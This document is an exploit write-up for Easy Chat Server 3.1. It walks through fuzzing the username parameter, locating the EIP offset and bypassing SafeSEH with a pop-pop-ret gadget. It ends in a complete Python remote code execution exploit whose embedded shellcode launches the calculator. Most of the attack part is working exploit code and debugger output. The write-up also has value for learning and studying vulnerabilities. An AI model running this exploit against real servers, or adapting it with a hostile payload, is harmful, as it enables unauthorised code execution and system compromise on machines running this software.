Easy Chat Server 3.1 Exploit (RCE)

Test Environment: Windows 10 x64
Test Program: Easy Chat Server 3.1 x86
Language used: Python 2.7
Debugger: Immunity Debugger
Module used: mona.py
Mitigation: StackGuard, safeSEH

 

 

Can start the chat server by executing the program.

When you click the start button, the server open and you can connect it.

 

 

To connect the chat server itself, we need to browse to IP.

 

 

After entering guest in Name, you can access random chat server to see the URL above.

URL: http://172.26.160.1/chat.ghp?username=guest&password=&room=1&sex=2

 

The user can pass the user name directly to the parameter and must fuzzing to locate the overflow location.

 

 

Use !mona pc 500 command to generate a string of specific patterns.

 

 

import socket

TARGET = "172.26.160.1"
PORT = 80

payload = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9A" 
    "d0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag" 
    "1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3" 
    "Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5" 
    "Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4" 
    "Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
)

buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host: 192.168.1.136:80\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://192.168.1.136\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(buf)

s.close()

Pass a string of specific patterns created after the debugger runs the server to the parameter.

 

 

The EIP register is manipulated to 0x34684133.

 

 

You can use the !mona po 34684133 command to find the EIP register offset value
And as you can see from the Mona output, the exact EIP register offset value is 221.

 

 

import socket

TARGET = "172.26.160.1"
PORT = 80

payload = ""
payload += "A" * 221
payload += "B" * 4
payload += "C" * 100

buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host: 192.168.1.136:80\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://192.168.1.136\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(buf)

s.close()

Fill the value 221 and manipulate the EIP to verify that the offset is correct.

If the offset is correct, the EIP will be manipulated with B.

 

 

And it was manipulated to the EIP value of 0x42424242 as we wanted.

 

 

The Safe SEH must be bypassed in order to exploit.

A pop pop ret gadget is required to bypass safeSEH

 

 

If the pExceptionHandler location has the address of the ppr gadget, ESP will be pointing to the ret somewhere at the top of the stack because the pExceptionHandler is called.

When the ppr gadget runs, the ret, ExceptionRecord is pop.

And the EstablisherFrame address is pNextSEHRecord.

If there is an address for the short jmp command that jump to shellcode, dummy + shellcode will be executed.

 

 

!mona findwild -s "pop r32#pop r32#ret" -m SSLEAY32.dll

Because SSLEAY32.dll does not have any protection techniques applied,use the

command above to find pop pop ret gadget

Null byte are used to indicate the end of a string, meaning if they are in your shellcode payload, it would cut off the string at that point, meaning our payload will not be fully executed.

 

ppr address: 0x100185e5

 

 

import socket

TARGET = "172.26.160.1"
PORT = 80

shellcode = (
    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 
    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 
    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 
    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 
    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 
    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 
    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 
    "\x1c\x39\xbd"
)

payload = ""
payload += "A" * 217
payload += "\xeb\x06\x90\x90" # jmp to shellcode
payload += "\xe5\x85\x01\x10" # pop/pop/ret
payload += shellcode
payload += "B" * 199

buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host: 192.168.1.136:80\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://192.168.1.136\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(buf)

s.close()

Exploit Code

 

 

The exploit was successful and the calculator was executed.

Successful exploitation could allow the calculator to run.